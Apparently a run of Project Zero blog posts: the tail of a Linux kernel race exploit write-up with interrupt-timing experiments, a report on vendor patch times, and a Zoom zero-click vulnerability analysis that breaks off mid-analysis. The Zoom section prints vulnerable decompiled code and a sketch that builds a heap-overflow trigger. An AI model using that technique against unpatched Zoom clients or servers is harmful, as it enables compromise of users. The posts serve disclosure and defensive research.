 alloc_debug_processing+0xd5/0x130
 ___slab_alloc+0x511/0x570
[...]
 __slab_alloc+0x1c/0x30
 kmem_cache_alloc_node+0x1f3/0x210
 __alloc_skb+0x46/0x1f0
 alloc_skb_with_frags+0x4d/0x1b0
 sock_alloc_send_pskb+0x1f3/0x220
[...]
 unix_stream_sendmsg+0x268/0x4d0
 sock_sendmsg+0x5e/0x60
 ____sys_sendmsg+0x22e/0x270
[...]
 ___sys_sendmsg+0x75/0xb0
[...]
 __sys_sendmsg+0x59/0xa0
 do_syscall_64+0x33/0x80
 entry_SYSCALL_64_after_hwframe+0x44/0xa9
[...]
FIX skbuff_head_cache: Restoring 0x00000000d7142451-0x00000000d7142451=0x6b
FIX skbuff_head_cache: Marking all objects used
RIP: 0010:unix_stream_read_generic+0x72b/0x870
Code: fe ff ff 31 ff e8 85 87 91 ff e9 a5 fe ff ff 45 01 77 44 8b 83 80 01 00 00 85 c0 0f 89 10 01 00 00 49 8b 47 38 48 85 c0 74 23 <0f> bf 00 66 85 c0 0f 85 20 01 00 00 4c 89 fe 48 8d 7c 24 58 44 89
RSP: 0018:ffffb789027f7cf0 EFLAGS: 00010202
RAX: 6b6b6b6b6b6b6b6b RBX: ffff982d1d897b40 RCX: 0000000000000000
RDX: 6a0fe1820359dce8 RSI: ffffffffa81f9ba0 RDI: 0000000000000246
RBP: ffff982d1d897ea8 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: ffff982d2645c900 R12: ffffb789027f7dd0
R13: ffff982d1d897c10 R14: 0000000000000001 R15: ffff982d3390e000
FS:  00007f547209d740(0000) GS:ffff98309fa40000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f54722cd000 CR3: 00000001b61f4002 CR4: 0000000000770ee0
PKRU: 55555554

Conclusion(s)

Hitting a race can become easier if, instead of racing two threads against each other, you race one thread against a hardware timer to create a gigantic timing window for the other thread. Hence the title! On the other hand, it introduces extra complexity because now you have to think about how timers actually work, and turns out, time is a complicated concept...

This shows that at least some really tight races can be hit reliably, and that we should treat them as security bugs, even if at first glance they seem very hard to hit.

Also, precisely timing races is hard, and the details of how long it actually takes the CPU to get from one point to another are mysterious. (As not only exploit writers know, but also anyone who's ever wanted to benchmark a performance-relevant change...)

Appendix: How impatient are interrupts?

I did also play around with this stuff on arm64 a bit, and I was wondering: At what points do interrupts actually get delivered? Does an incoming interrupt force the CPU to drop everything immediately, or do inflight operations finish first? This gets particularly interesting on phones that contain two or three different types of CPUs mixed together.

On a Pixel 4 (which has 4 slow in-order cores, 3 fast cores, and 1 faster core), I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register, while running this loop:

  400680:        91000442        add     x2, x2, #0x1
  400684:        91000421        add     x1, x1, #0x1
  400688:        9ac20820        udiv    x0, x1, x2
  40068c:        91006800        add     x0, x0, #0x1a
  400690:        91000400        add     x0, x0, #0x1
  400694:        91000442        add     x2, x2, #0x1
  400698:        91000421        add     x1, x1, #0x1
  40069c:        91000442        add     x2, x2, #0x1
  4006a0:        91000421        add     x1, x1, #0x1
  4006a4:        9ac20820        udiv    x0, x1, x2
  4006a8:        91006800        add     x0, x0, #0x1a
  4006ac:        91000400        add     x0, x0, #0x1
  4006b0:        91000442        add     x2, x2, #0x1
  4006b4:        91000421        add     x1, x1, #0x1
  4006b8:        91000442        add     x2, x2, #0x1
  4006bc:        91000421        add     x1, x1, #0x1
  4006c0:        17fffff0        b       400680 <main+0xe0>

The logged interrupt PCs had the following distribution on a slow in-order core:

A histogram of PC register values, where most instructions in the loop have roughly equal frequency, the instructions after udiv instructions have twice the frequency, and two other instructions have zero frequency.

and this distribution on a fast out-of-order core:

A histogram of PC register values, where the first instruction of the loop has very high frequency, the following 4 instructions have near-zero frequency, and the following instructions have low frequencies

As always, out-of-order (OOO) cores make everything weird, and the start of the loop seems to somehow "provide cover" for the following instructions; but on the in-order core, we can see that more interrupts arrive after the slow udiv instructions. So apparently, when one of those is executing while an interrupt arrives, it continues executing and doesn't get aborted somehow?
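
For reference, a hedged sketch of how such a PC-sampling measurement can be set up (glibc and arm64 mcontext field names assumed; on x86 the PC would come from uc_mcontext.gregs[REG_RIP] instead):

  /* Sketch: 100 Hz interval timer via timer_create(); the SIGALRM handler
   * records the PC at which the main loop was interrupted (arm64 layout). */
  #define _GNU_SOURCE
  #include <signal.h>
  #include <stdint.h>
  #include <time.h>
  #include <ucontext.h>

  #define SLOTS (1 << 20)
  static volatile uint64_t pc_log[SLOTS];
  static volatile int n_samples;

  static void on_tick(int sig, siginfo_t *si, void *ucv) {
      (void)sig; (void)si;
      ucontext_t *uc = ucv;
      if (n_samples < SLOTS)
          pc_log[n_samples++] = uc->uc_mcontext.pc;  /* interrupted PC */
  }

  int main(void) {
      struct sigaction sa = { 0 };
      sa.sa_sigaction = on_tick;
      sa.sa_flags = SA_SIGINFO;
      sigaction(SIGALRM, &sa, 0);

      timer_t t;
      struct sigevent sev = { 0 };
      sev.sigev_notify = SIGEV_SIGNAL;
      sev.sigev_signo = SIGALRM;
      timer_create(CLOCK_MONOTONIC, &sev, &t);

      struct itimerspec its = { { 0, 10000000 }, { 0, 10000000 } };  /* 100 Hz */
      timer_settime(t, 0, &its, 0);

      for (;;) { /* the measured instruction loop goes here */ }
  }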

With the following loop, which has a LDR instruction mixed in that accesses a memory location that is constantly being modified by another thread:

  4006a0:        91000442        add     x2, x2, #0x1
  4006a4:        91000421        add     x1, x1, #0x1
  4006a8:        9ac20820        udiv    x0, x1, x2
  4006ac:        91006800        add     x0, x0, #0x1a
  4006b0:        91000400        add     x0, x0, #0x1
  4006b4:        91000442        add     x2, x2, #0x1
  4006b8:        91000421        add     x1, x1, #0x1
  4006bc:        91000442        add     x2, x2, #0x1
  4006c0:        91000421        add     x1, x1, #0x1
  4006c4:        9ac20820        udiv    x0, x1, x2
  4006c8:        91006800        add     x0, x0, #0x1a
  4006cc:        91000400        add     x0, x0, #0x1
  4006d0:        91000442        add     x2, x2, #0x1
  4006d4:        f9400061        ldr     x1, [x3]
  4006d8:        91000421        add     x1, x1, #0x1
  4006dc:        91000442        add     x2, x2, #0x1
  4006e0:        91000421        add     x1, x1, #0x1
  4006e4:        17ffffef        b       4006a0 <main+0x100>

the cache-missing loads obviously have a large influence on the timing. On the in-order core:

A histogram of interrupt instruction pointers, showing that most interrupts are delivered with PC pointing to the instruction after the high-latency load instruction.

On the OOO core:

A similar histogram as the previous one, except that an even larger fraction of interrupt PCs are after the high-latency load instruction.

What is interesting to me here is that the timer interrupts seem to again arrive after the slow load - implying that if an interrupt arrives while a slow memory access is in progress, the interrupt handler may not get to execute until the memory access has finished? (Unless maybe on the OOO core the interrupt handler can start speculating already? I wouldn't really expect that, but could imagine it.)

On an x86 Skylake CPU, we can do a similar test:

    11b8:        48 83 c3 01        add    $0x1,%rbx
    11bc:        48 83 c0 01        add    $0x1,%rax
    11c0:        48 01 d8           add    %rbx,%rax
    11c3:        48 83 c3 01        add    $0x1,%rbx
    11c7:        48 83 c0 01        add    $0x1,%rax
    11cb:        48 01 d8           add    %rbx,%rax
    11ce:        48 03 02           add    (%rdx),%rax
    11d1:        48 83 c0 01        add    $0x1,%rax
    11d5:        48 83 c3 01        add    $0x1,%rbx
    11d9:        48 01 d8           add    %rbx,%rax
    11dc:        48 83 c3 01        add    $0x1,%rbx
    11e0:        48 83 c0 01        add    $0x1,%rax
    11e4:        48 01 d8           add    %rbx,%rax
    11e7:        eb cf              jmp    11b8 <main+0xf8>

with a similar result:

A histogram of interrupt instruction pointers, showing that almost all interrupts were delivered with RIP pointing to the instruction after the high-latency load.

This means that if the first access to the file terminated our race window (which is not the case), we probably wouldn't be able to win the race by making the access to the file slow - instead we'd have to slow down one of the operations before that. (But note that I have only tested simple loads, not stores or read-modify-write operations here.)

A walk through Project Zero metrics

By: Ryan
10 February 2022 at 16:58

Posted by Ryan Schoen, Project Zero

tl;dr

  • In 2021, vendors took an average of 52 days to fix security vulnerabilities reported from Project Zero. This is a significant acceleration from an average of about 80 days 3 years ago.
  • In addition to the average now being well below the 90-day deadline, we have also seen a dropoff in vendors missing the deadline (or the additional 14-day grace period). In 2021, only one bug exceeded its fix deadline, though 14% of bugs required the grace period.
  • Differences in the amount of time it takes a vendor/product to ship a fix to users reflects their product design, development practices, update cadence, and general processes towards security reports. We hope that this comparison can showcase best practices, and encourage vendors to experiment with new policies.
  • This data aggregation and analysis is relatively new for Project Zero, but we hope to do it more in the future. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities, as well as more data sharing and transparency in general.

Overview

For nearly ten years, Google’s Project Zero has been working to make it more difficult for bad actors to find and exploit security vulnerabilities, significantly improving the security of the Internet for everyone. In that time, we have partnered with folks across industry to transform the way organizations prioritize and approach fixing security vulnerabilities and updating people’s software.

To help contextualize the shifts we are seeing the ecosystem make, we looked back at the set of vulnerabilities Project Zero has been reporting, how a range of vendors have been responding to them, and then attempted to identify trends in this data, such as how the industry as a whole is patching vulnerabilities faster.

For this post, we look at fixed bugs that were reported between January 2019 and December 2021 (2019 is the year we made changes to our disclosure policies and also began recording more detailed metrics on our reported bugs). The data we'll be referencing is publicly available on the Project Zero Bug Tracker, and on various open source project repositories (in the case of the data used below to track the timeline of open-source browser bugs).

There are a number of caveats with our data, the largest being that we'll be looking at a small number of samples, so differences in numbers may or may not be statistically significant. Also, the direction of Project Zero's research is almost entirely influenced by the choices of individual researchers, so changes in our research targets could shift metrics as much as changes in vendor behaviors could. As much as possible, this post is designed to be an objective presentation of the data, with additional subjective analysis included at the end.

The data!

Between 2019 and 2021, Project Zero reported 376 issues to vendors under our standard 90-day deadline. 351 (93.4%) of these bugs have been fixed, while 14 (3.7%) have been marked as WontFix by the vendors. 11 (2.9%) other bugs remain unfixed, though at the time of this writing 8 have passed their deadline to be fixed; the remaining 3 are still within their deadline to be fixed. Most of the vulnerabilities are clustered around a few vendors, with 96 bugs (26%) being reported to Microsoft, 85 (23%) to Apple, and 60 (16%) to Google.

Deadline adherence

Once a vendor receives a bug report under our standard deadline, they have 90 days to fix it and ship a patched version to the public. The vendor can also request a 14-day grace period if the vendor confirms they plan to release the fix by the end of that total 104-day window.

In this section, we'll be taking a look at how often vendors are able to hit these deadlines. The table below includes all bugs that have been reported to the vendor under the 90-day deadline since January 2019 and have since been fixed, for vendors with the most bug reports in the window.

Deadline adherence and fix time 2019-2021, by bug report volume

Vendor      Total bugs   Fixed by day 90   Fixed during grace period   Exceeded deadline & grace period   Avg days to fix
Apple       84           73 (87%)          7 (8%)                      4 (5%)                             69
Microsoft   80           61 (76%)          15 (19%)                    4 (5%)                             83
Google      56           53 (95%)          2 (4%)                      1 (2%)                             44
Linux       25           24 (96%)          0 (0%)                      1 (4%)                             25
Adobe       19           15 (79%)          4 (21%)                     0 (0%)                             65
Mozilla     10           9 (90%)           1 (10%)                     0 (0%)                             46
Samsung     10           8 (80%)           2 (20%)                     0 (0%)                             72
Oracle      7            3 (43%)           0 (0%)                      4 (57%)                            109
Others*     55           48 (87%)          3 (5%)                      4 (7%)                             44
TOTAL       346          294 (84%)         34 (10%)                    18 (5%)                            61

* For completeness, the vendors included in the "Others" bucket are Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Node.js, opencontainers, QT, Qualcomm, RedHat, Reliance, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

Overall, the data show that almost all of the big vendors here are coming in under 90 days, on average. The bulk of fixes during a grace period come from Apple and Microsoft (22 out of 34 total).

Vendors have exceeded the deadline and grace period about 5% of the time over this period. In this slice, Oracle has exceeded at the highest rate, but admittedly with a small sample size of only 7 bugs. The next-highest rate is Microsoft, having exceeded 4 of their 80 deadlines.

The average number of days to fix a bug across all vendors is 61. Zooming in on just that stat, we can break it out by year:

Bug fix time 2019-2021, by bug report volume

Vendor      Bugs in 2019 (avg days to fix)   Bugs in 2020 (avg days to fix)   Bugs in 2021 (avg days to fix)
Apple       61 (71)                          13 (63)                          11 (64)
Microsoft   46 (85)                          18 (87)                          16 (76)
Google      26 (49)                          13 (22)                          17 (53)
Linux       12 (32)                          8 (22)                           5 (15)
Others*     54 (63)                          35 (54)                          14 (29)
TOTAL       199 (67)                         87 (54)                          63 (52)

* For completeness, the vendors included in the "Others" bucket are Adobe, Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Mozilla, Node.js, opencontainers, Oracle, QT, Qualcomm, RedHat, Reliance, Samsung, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

From this, we can see a few things: first of all, the overall time to fix has consistently been decreasing, most significantly between 2019 and 2020. Microsoft, Apple, and Linux have all reduced their time to fix over the period, whereas Google sped up in 2020 before slowing down again in 2021. Perhaps most impressively, the vendors grouped under "Others" have collectively cut their time to fix by more than half, though it's possible this represents a change in research targets rather than a change in practices for any particular vendor.

Finally, focusing on just 2021, we see:

  • Only 1 deadline exceeded, versus an average of 9 per year in the other two years
  • The grace period used 9 times (notably with half of those uses being by Microsoft), versus an average of 12.5 times per year in the other two years

Mobile phones

Since the products in the previous table span a range of types (desktop operating systems, mobile operating systems, browsers), we can also focus on a particular, hopefully more apples-to-apples comparison: mobile phone operating systems.

Vendor              Total bugs   Avg fix time
iOS                 76           70
Android (Samsung)   10           72
Android (Pixel)     6            72

The first thing to note is that it appears that iOS received remarkably more bug reports from Project Zero than any flavor of Android did during this time period, but rather than an imbalance in research target selection, this is more a reflection of how Apple ships software. Security updates for "apps" such as iMessage, Facetime, and Safari/WebKit are all shipped as part of the OS updates, so we include those in the analysis of the operating system. On the other hand, security updates for standalone apps on Android happen through the Google Play Store, so they are not included here in this analysis.

Despite that, all three vendors have an extraordinarily similar average time to fix. With the data we have available, it's hard to determine how much time is spent on each part of the vulnerability lifecycle (e.g. triage, patch authoring, testing, etc). However, open-source products do provide a window into where time is spent.

Browsers

For most software, we aren't able to dig into specifics of the timeline. Specifically: after a vendor receives a report of a security issue, how much of the "time to fix" is spent between the bug report and landing the fix, and how much time is spent between landing that fix and releasing a build with the fix? The one window we do have is into open-source software, and specific to the type of vulnerability research that Project Zero does, open-source browsers.

Fix time analysis for open-source browsers, by bug volume

Browser   Bugs   Avg days from bug report to public patch   Avg days from public patch to release   Avg days from bug report to release
Chrome    40     5.3                                        24.6                                    29.9
WebKit    27     11.6                                       61.1                                    72.7
Firefox   8      16.6                                       21.1                                    37.8
Total     75     8.8                                        37.3                                    46.1

We can also take a look at the same data, but with each bug spread out in a histogram. In particular, the histogram of the amount of time from a fix landing in public to that fix being shipped to users tells a clear story (in the table above, this corresponds to the "Avg days from public patch to release" column):

Histogram showing the distributions of time from a fix landing in public to a fix shipping for Firefox, Webkit, and Chrome. The fact that Webkit is still on the higher end of the histogram tells us that most of their time is spent shipping the fixed build after the fix has landed.

The table and chart together tell us a few things:

Chrome is currently the fastest of the three browsers, averaging 30 days from bug report to a fix shipped in the stable channel. The time to patch is very fast here, with an average of just 5 days between the bug report and the patch landing in public. The time for that patch to be released to the public makes up the bulk of the overall window, though overall we still see the Chrome (blue) bars of the histogram toward the left side of the histogram. (Important note: despite being housed within the same company, Project Zero follows the same policies and procedures with Chrome that an external security researcher would follow. More information on that is available in our Vulnerability Disclosure FAQ.)

Firefox comes in second in this analysis, though with a relatively small number of data points to analyze. Firefox releases a fix on average in 38 days. A little under half of that is time for the fix to land in public, though it's important to note that Firefox intentionally delays committing security patches to reduce the amount of exposure before the fix is released. Once the patch has been made public, it releases the fixed build on average a few days faster than Chrome – with the vast majority of the fixes shipping 10-15 days after their public patch.

WebKit is the outlier in this analysis, with the longest average time from bug report to release, at 73 days. Its time to land the fix publicly sits between Chrome's and Firefox's, but unfortunately this leaves a very long window in which opportunistic attackers can find the patch and exploit it before the fix is made available to users. This can be seen in the Apple (red) bars of the second histogram mostly being on the right side of the graph, with all but one of them past the 30-day mark.

Analysis, hopes, and dreams

Overall, we see a number of promising trends emerging from the data. Vendors are fixing almost all of the bugs that they receive, and they generally do it within the 90-day deadline plus the 14-day grace period when needed. Over the past three years vendors have, for the most part, accelerated their patching, effectively reducing the overall average time to fix to about 52 days. In 2021, there was only one 90-day deadline exceeded. We suspect that this trend may be due to the fact that responsible disclosure policies have become the de facto standard in the industry, and vendors are better equipped to react rapidly to reports with differing deadlines. We also suspect that vendors have learned best practices from each other, as there has been increasing transparency in the industry.

One important caveat: we are aware that reports from Project Zero may be outliers compared to other bug reports, in that they may receive faster action as there is a tangible risk of public disclosure (as the team will disclose if deadline conditions are not met) and Project Zero is a trusted source of reliable bug reports. We encourage vendors to release metrics, even if they are high level, to give a better overall picture of how quickly security issues are being fixed across the industry, and continue to encourage other security researchers to share their experiences.

For Google, and in particular Chrome, we suspect that the quick turnaround time on security bugs is in part due to their rapid release cycle, as well as their additional stable releases for security updates. We're encouraged by Chrome's recent switch from a 6-week release cycle to a 4-week release cycle. On the Android side, we see the Pixel variant of Android releasing fixes about on par with the Samsung variants as well as iOS. Even so, we encourage the Android team to look for additional ways to speed up the application of security updates and push that segment of the industry further.

For Apple, we're pleased with the acceleration of patches landing, as well as the recent lack of use of grace periods as well as lack of missed deadlines. For WebKit in particular, we hope to see a reduction in the amount of time it takes between landing a patch and shipping it out to users, especially since WebKit security affects all browsers used in iOS, as WebKit is the only browser engine permitted on the iOS platform.

For Microsoft, we suspect that the high time to fix and Microsoft's reliance on the grace period are consequences of the monthly cadence of Microsoft's "patch Tuesday" updates, which can make it more difficult for development teams to meet a disclosure deadline. We hope that Microsoft might consider implementing a more frequent patch cadence for security issues, or finding ways to further streamline their internal processes to land and ship code quicker.

Moving forward

This post represents some number-crunching we've done of our own public data, and we hope to continue this going forward. Now that we've established a baseline over the past few years, we plan to continue to publish an annual update to better understand how the trends progress.

To that end, we'd love to have even more insight into the processes and timelines of our vendors. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities. Through more transparency, information sharing, and collaboration across the industry, we believe we can learn from each other's best practices, better understand existing difficulties and hopefully make the internet a safer place for all.

Zooming in on Zero-click Exploits

By: Ryan
18 January 2022 at 17:28

Posted by Natalie Silvanovich, Project Zero


Zoom is a video conferencing platform that has gained popularity throughout the pandemic. Unlike other video conferencing systems that I have investigated, where one user initiates a call that other users must immediately accept or reject, Zoom calls are typically scheduled in advance and joined via an email invitation. In the past, I hadn’t prioritized reviewing Zoom because I believed that any attack against a Zoom client would require multiple clicks from a user. However, a zero-click attack against the Windows Zoom client was recently revealed at Pwn2Own, showing that it does indeed have a fully remote attack surface. The following post details my investigation into Zoom.

This analysis resulted in two vulnerabilities being reported to Zoom. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

Zoom Attack Surface Overview

Zoom’s main feature is multi-user conference calls called meetings that support a variety of features including audio, video, screen sharing and in-call text messages. There are several ways that users can join Zoom meetings. To start, Zoom provides full-featured installable clients for many platforms, including Windows, Mac, Linux, Android and iPhone. Users can also join Zoom meetings using a browser link, but they are able to use fewer features of Zoom. Finally, users can join a meeting by dialing phone numbers provided in the invitation on a touch-tone phone, but this only allows access to the audio stream of a meeting. This research focused on the Zoom client software, as the other methods of joining calls use existing device features.

Zoom clients support several communication features other than meetings that are available to a user’s Zoom Contacts. A Zoom Contact is a user that another user has added as a contact using the Zoom user interface. Both users must consent before they become Zoom Contacts. Afterwards, the users can send text messages to one another outside of meetings and start channels for persistent group conversations. Also, if either user hosts a meeting, they can invite the other user in a manner that is similar to a phone call: the other user is immediately notified and they can join the meeting with a single click. These features represent the zero-click attack surface of Zoom. Note that this attack surface is only available to attackers that have convinced their target to accept them as a contact. Likewise, meetings are part of the one-click attack surface only for Zoom Contacts, as other users need to click several times to enter a meeting.

That said, it’s likely not that difficult for a dedicated attacker to convince a target to join a Zoom call even if it takes multiple clicks, and the way some organizations use Zoom presents interesting attack scenarios. For example, many groups host public Zoom meetings, and Zoom supports a paid Webinar feature where large groups of unknown attendees can join a one-way video conference. It could be possible for an attacker to join a public meeting and target other attendees. Zoom also relies on a server to transmit audio and video streams, and end-to-end encryption is off by default. It could be possible for an attacker to compromise Zoom’s servers and gain access to meeting data.

Zoom Messages

I started out by looking at the zero-click attack surface of Zoom. Loading the Linux client into IDA, it appeared that a great deal of its server communication occurred over XMPP. Based on strings in the binary, it was clear that XMPP parsing was performed using a library called gloox. I fuzzed this library using AFL and other coverage-guided fuzzers, but did not find any vulnerabilities. I then looked at how Zoom uses the data provided over XMPP.

XMPP traffic seemed to be sent over SSL, so I located the SSL_write function in the binary based on log strings, and hooked it using Frida. The output contained many XMPP stanzas (messages) as well as other network traffic, which I analyzed to determine how XMPP is used by Zoom. XMPP is used for most communication between Zoom clients outside of meetings, such as messages and channels, and is also used for signaling (call set-up) when a Zoom Contact invites another Zoom Contact to a meeting.

I spent some time going through the client binary trying to determine how the client processes XMPP, for example, if a stanza contains a text message, how is that message extracted and displayed in the client. Even though the Zoom client contains many log strings, this was challenging, and I eventually asked my teammate Ned Williamson for help locating symbols for the client. He discovered that several old versions of the Android Zoom SDK contained symbols. While these versions are roughly five years old, and do not present a complete view of the client as they only include some libraries that it uses, they were immensely helpful in understanding how Zoom uses XMPP.

Application-defined tags can be added to gloox’s XMPP parser by extending the class StanzaExtension and implementing the method newInstance to define how the tag is converted into a C++ object. Parsed XMPP stanzas are then processed using the MessageHandler class. Application developers extend this class, implementing the method handleMessage with code that performs application functionality based on the contents of the stanza received. Zoom implements its XMPP handling in CXmppIMSession::handleMessage, which is a large function that is an entrypoint to most messaging and calling features. The final processing stage of many XMPP tags is in the class ns_zoom_messager::CZoomMMXmppWrapper, which contains many methods starting with ‘On’ that handle specific events. I spent a fair amount of time analyzing these code paths, but didn’t find any bugs. Interestingly, Thijs Alkemade and Daan Keuper released a write-up of their Pwn2Own bug after I completed this research, and it involved a vulnerability in this area.

RTP Processing

Afterwards, I investigated how Zoom clients process audio and video content. Like all other video conferencing systems that I have analyzed, it uses Real-time Transport Protocol (RTP) to transport this data. Based on log strings included in the Linux client binary, Zoom appears to use a branch of WebRTC for audio. Since I have looked at this library a great deal in previous posts, I did not investigate it further. For video, Zoom implements its own RTP processing and uses a custom underlying codec named Zealot (libzlt).

Analyzing the Linux client in IDA, I found what I believed to be the video RTP entrypoint, and fuzzed it using afl-qemu. This resulted in several crashes, mostly in RTP extension processing. I tried modifying the RTP sent by a client to reproduce these bugs, but it was not received by the device on the other side and I suspected the server was filtering it. I tried to get around this by enabling end-to-end encryption, but Zoom does not encrypt RTP headers, only the contents of RTP packets (as is typical of most RTP implementations).

Curious about how Zoom server filtering works, I decided to set up Zoom On-Premises Deployment. This is a Zoom product that allows customers to set up on-site servers to process their organization’s Zoom calls. This required a fair amount of configuration, and I ended up reaching out to the Zoom Security Team for assistance. They helped me get it working, and I greatly appreciate their contribution to this research.

Zoom On-Premises Deployments consist of two hosts: the controller and the Multimedia Router (MMR). Analyzing the traffic to each server, it became clear that the MMR is the host that transmits audio and video content between Zoom clients. Loading the code for the MMR process into IDA, I located where RTP is processed, and it indeed parses the extensions as a part of its forwarding logic and verifies them correctly, dropping any RTP packets that are malformed.

The code that processes RTP on the MMR appeared different from the code that I fuzzed on the device, so I set up fuzzing on the server code as well. This was challenging, as the code was in the MMR binary, which was not compiled as a relocatable binary (more on this later). This meant that I couldn't load it as a library and call into specific offsets in the binary as I usually do to fuzz binaries that don't have source code available. Instead, I compiled my own fuzzing stub, a relocatable shared object that defined fopen and called the function I wanted to fuzz, and loaded it using LD_PRELOAD when executing the MMR binary. Then my code would take control of execution the first time the MMR binary called fopen, and was able to call the function being fuzzed.

This approach has a lot of downsides, the biggest being that the fuzzing stub can’t accept command line parameters, execution is fairly slow and a lot of fuzzing tools don’t honor LD_PRELOAD on the target. That said, I was able to fuzz with code coverage using Mateusz Jurczyk’s excellent DrSanCov, with no results.
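
A hedged sketch of that LD_PRELOAD harness shape (the target address, signature, and input feeding are placeholders, not Zoom's actual symbols; the real stub would also need the fuzzer integration):

  /* Sketch: a preloaded shared object that defines fopen(); the first call
   * from the target binary hands control to a routine that calls into a
   * fixed (non-relocatable) address in the MMR binary. TARGET_ADDR and the
   * parser signature are placeholders. */
  #define _GNU_SOURCE
  #include <dlfcn.h>
  #include <stdio.h>

  #define TARGET_ADDR 0x401000UL  /* placeholder: offset of the parser */

  typedef void (*parse_fn)(const unsigned char *data, unsigned long len);

  FILE *fopen(const char *path, const char *mode) {
      static int hijacked;
      FILE *(*real_fopen)(const char *, const char *) =
          (FILE *(*)(const char *, const char *))dlsym(RTLD_NEXT, "fopen");
      if (!hijacked) {
          hijacked = 1;
          parse_fn target = (parse_fn)TARGET_ADDR;
          /* ... read fuzz input and call target(input, input_len) here ... */
          (void)target;
      }
      return real_fopen(path, mode);
  }

Built with something like `gcc -shared -fPIC -o stub.so stub.c -ldl` and run via `LD_PRELOAD=./stub.so ./mmr`, on the assumption that the target binary calls fopen early in startup.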

Packet Processing

When analyzing RTP traffic, I noticed that both Zoom clients and the MMR server process a great deal of packets that didn’t appear to be RTP or XMPP. Looking at the SDK with symbols, one library appeared to do a lot of serialization: libssb_sdk.so. This library contains a great deal of classes with the methods load_from and save_to defined with identical declarations, so it is likely that they all implement the same virtual class.

One parameter to the load_from methods is an object of class msg_db_t, which implements a buffer that supports reading different data types. Deserialization is performed by load_from methods by reading the needed data from the msg_db_t object, and serialization is performed by save_to methods by writing to it.

After hooking a few save_to methods with Frida and comparing the written output to data sent with SSL_write, it became clear that these serialization classes are part of the remote attack surface of Zoom. Reviewing each load_from method, several contained code similar to the following (from ssb::conf_send_msg_req::load_from).

  ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(
      msg_db, &this->str_len, consume_bytes, error_out);
  str_len = this->str_len;
  if ( str_len )
  {
    mem = operator new[](str_len);
    out_len = 0;
    this->str_mem = mem;
    ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::read_str_with_len(
        msg_db, mem, &out_len);

read_str_with_len is defined as follows.

int __fastcall ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::read_str_with_len(
    msg_db_t* msg, signed __int8 *mem, unsigned int *len)
{
  if ( !msg->invalid )
  {
    ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(msg, len, (int)len, 0);
    if ( !msg->invalid )
    {
      if ( *len )
        ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::read(msg, mem, *len, 0);
    }
  }
  return msg;
}

Note that the string buffer is allocated based on a length read from the msg_db_t buffer, but then a second length is read from the buffer and used as the length of the string that is read. This means that if an attacker could manipulate the contents of the msg_db_t buffer, they could specify the length of the buffer allocated, and overwrite it with any length of data (up to a limit of 0x1FFF bytes, not shown in the code snippet above).
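
To make the mismatch concrete, here is a hedged sketch of the two-length pattern (the field encoding is illustrative, not Zoom's actual wire format):

  /* Sketch of the mismatched-lengths pattern: alloc_len sizes the heap
   * allocation, copy_len controls how much is written into it. */
  #include <stdint.h>
  #include <string.h>

  size_t build_overflow_field(uint8_t *out, uint32_t alloc_len,
                              uint32_t copy_len, const uint8_t *payload) {
      size_t off = 0;
      memcpy(out + off, &alloc_len, sizeof(alloc_len));  /* -> operator new[](alloc_len) */
      off += sizeof(alloc_len);
      memcpy(out + off, &copy_len, sizeof(copy_len));    /* -> length passed to read() */
      off += sizeof(copy_len);
      memcpy(out + off, payload, copy_len);              /* copy_len may exceed alloc_len
                                                            (up to the 0x1FFF limit) */
      off += copy_len;
      return off;
  }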

I tested this bug by hooking SSL_write with Frida, and sending the malformed packet, and it caused the Zoom client to crash on a variety of platforms. This vulnerability was assigned CVE-2021-34423 and fixed on November 24, 2021.

Looking at the code for the MMR server, I noticed that ssb::conf_send_msg_req::load_from, the class the vulnerability occurs in, was also present on the MMR server. Since the MMR forwards Zoom meeting traffic from one client to another, it makes sense that it might also deserialize this packet type. I analyzed the MMR code in IDA, and found that deserialization of this class only occurs during Zoom Webinars. I purchased a Zoom Webinar license, and was able to crash my own Zoom MMR server by sending this packet. I was not willing to test a vulnerability of this type on Zoom's public MMR servers, but it seems reasonably likely that the same code was also in Zoom's public servers.

Looking further at deserialization, I noticed that all deserialized objects contain an optional field of type ssb::dyna_para_table_t, which is basically a properties table that allows a map of name strings to variant objects to be included in the deserialized object. The variants in the table are implemented by the structure ssb::variant_t, as follows.

struct variant{
        char type;
        short length;
        var_data data;
};

union var_data{
        char i8;
        char* i8_ptr;
        short i16;
        short* i16_ptr;
        int i32;
        int* i32_ptr;
        long long i64;
        long long* i64_ptr;
};

The value of the type field corresponds to the width of the variant data (1 for 8-bit, 2 for 16-bit, 3 for 32-bit and 4 for 64-bit). The length field specifies whether the variant is an array and, if so, its length. If it has the value 0, the variant is not an array, and a numeric value is read from the data field based on its type. If the length field has any other value, the data field is cast to a pointer, and an array of that size is read from it.

